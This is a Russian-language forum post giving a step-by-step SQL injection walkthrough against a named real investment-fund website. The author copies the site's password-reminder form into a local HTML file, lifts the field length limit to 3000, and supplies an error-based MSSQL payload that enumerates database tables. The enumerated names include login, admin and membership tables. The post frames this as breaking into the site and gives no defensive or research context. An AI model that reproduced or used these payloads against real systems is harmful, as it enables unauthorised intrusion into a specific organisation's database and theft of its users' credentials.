sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
ну ладно…. расскажу всё по порядку, кому интересно смотрите и вкуриваьте…
но вот если попробовать перебирать таблицы, то возникает проблема: количество символов в поле ретрива ограничено.
поэтому идем другим путем: открываем исходный код страницы и берем оттуда фрагмент:
<h1>Login Reminder</h1>
<p>Enter the email we have on record for you, click on "Send
Login," and your login information will be mailed immediately
to that address.</p><br /><form name="frmForgot" method="post" action="/forgot.asp" onSubmit="return EditCheck();">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="where" value="">Your Email: <input type="text" name="email" class="formBox" size="30" maxlength="100" value=""><br /><br />
<input type="submit" class="formButton" value="Send Login"> <input type="button" class="formButton" value="Cancel" onClick="document.location.href='login.asp?where=';">
</form><script language="javascript">
function EditCheck() {
if (CheckNull('frmForgot','email','Please enter your Email Address.')) {
return false;
}
if (CheckEmail('frmForgot','email','The email address you entered\ndoes not appear to be valid.')) {
return false;
}
}
document.frmForgot.email.focus();
</script> создаем у себя на винте файл html, в который копирем этот код между тегами и немного его видоизменяем:
<html>
<h1>Login Reminder</h1>
<p>Enter the email we have on record for you, click on "Send
Login," and your login information will be mailed immediately
to that address.</p><br /><form name="frmForgot" method="post" action="https://www.centennialfunds.com/forgot.asp" onSubmit="return EditCheck();">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="where" value="">Your Email: <input type="text" name="email" class="formBox" size="100" maxlength="3000" value=""><br /><br />
<input type="submit" class="formButton" value="Send Login"> <input type="button" class="formButton" value="Cancel" onClick="document.location.href='login.asp?where=';">
</form><script language="javascript">
function EditCheck() {
if (CheckNull('frmForgot','email','Please enter your Email Address.')) {
return false;
}
if (CheckEmail('frmForgot','email','The email address you entered\ndoes not appear to be valid.')) {
return false;
}
}
document.frmForgot.email.focus();
</script>
<div id="foo" runat="server">
<p><br /><br /><br /><br />Copyright
<script type="text/javascript">
</html> прописываем урл сайта и увеличиваем колличество символов в поле:
maxlength="3000" я сначала поставил 1000, но не хватило.
и потом уже перебираем имена таблиц и полей:
1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('centPhotos','centCharts','centFundsReturnMonthly ','centFunds','aspnet_Applications','aspnet_Member ship','aspnet_Paths','aspnet_PersonalizationAllUse rs','aspnet_PersonalizationPerUser','aspnet_Profil e','aspnet_Roles','aspnet_SchemaVersions','AspNet_ SqlCacheTablesForChangeNotification','aspnet_Users ','aspnet_UsersInRoles','aspnet_WebEvent_Events',' centFundsInfo','centFundsPerformance','centFundsPe rformanceHeaders','centFundsReturnCumulative','cen tFundsReturnCumulativeHeaders','centFundsReturnMon thlyHeaders','centFundsStrategy','centFundsStrateg yHeaders','centGlossaryGeneral','centGlossaryStrat egy','centPeople','cmsContent','cmsSiteMap','cpAdm in','cpAdvisors','cpCalendarFiles','cpCustomers',' cpDiligence','cpEvents','cpFlashes','cpFunds','cpL inks','cpLogins','cpManagers','cpNewsletters','cpS naps','cpXref','dtproperties','sysconstraints','sy ssegments','vw_aspnet_Applications','vw_aspnet_Mem bershipUsers','vw_aspnet_Profiles','vw_aspnet_Role s','vw_aspnet_Users','vw_aspnet_UsersInRoles','vw_ aspnet_WebPartState_Paths','vw_aspnet_WebPartState _Shared','vw_aspnet_WebPartState_User'))–
только не забудьте, это Post запрос, поэтому никаких плюсов в нем ставить не надо, только пробелы.
|
проникаем в www.centennialfunds.com - 
